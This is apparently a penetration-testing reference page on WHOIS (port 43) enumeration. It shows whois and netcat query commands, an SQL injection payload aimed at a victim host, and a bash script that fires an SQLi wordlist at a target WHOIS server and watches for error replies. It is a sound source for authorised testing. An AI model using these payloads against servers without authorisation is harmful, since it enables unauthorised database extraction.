WHOIS - Port 43
Basic Information
WHOIS is a protocol used to query databases to obtain information about the registrants of various internet resources, including domain names, IP address blocks, and autonomous systems. It operates on a standard port and can be a key tool in information gathering during penetration testing.
Default port: 43
PORT STATE SERVICE
43/tcp open whois
Enumerating WHOIS
To begin with WHOIS enumeration, you can query a WHOIS server to extract all available information about a domain:
whois -h <HOST> -p <PORT> "domain.tld"
Alternatively, you can also use netcat for the same purpose:
echo "domain.tld" | nc -vn <HOST> <PORT>
Database Information
Often, the WHOIS server responds with the name of the database being queried. This is useful information for further enumeration. It's important to remember that WHOIS services rely on databases to store and retrieve the information, which opens the possibility for SQL injection vulnerabilities.
Using the following query:
whois -h <Victim_ip> -p 43 "a') or 1=1#"
If the WHOIS server is vulnerable, you could extract all the information stored in the underlying database. This makes it essential to consider WHOIS as a potential vector for SQL injection attacks when testing.
Automate script for SQLi:
#!/bin/bash
# Variables
HOST="10.10.10.10" # Change to the target IP
PORT="43" # Default WHOIS port
WORDLIST="/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt" # Path to your SQLi wordlist
# Check if wordlist exists
if [[ ! -f "$WORDLIST" ]]; then
echo "Wordlist not found!"
exit 1
fi
# Loop through each payload in the wordlist
while IFS= read -r payload; do
echo "Testing with payload: $payload"
# Perform the WHOIS request with the current payload
response=$(whois -h $HOST -p $PORT "$payload")
# Check the response for SQLi indicators (change this according to the specific indicator you want)
if echo "$response" | grep -qi "syntax error\|unexpected"; then
echo "Possible SQLi detected with payload: $payload"
echo "Response: $response"
echo "-------------------------------------------"
fi
done < "$WORDLIST"
echo "SQLi test completed."
Make the script executable:
chmod +x whois-sqli-tester.sh
./whois-sqli-tester.sh
Last updated
Was this helpful?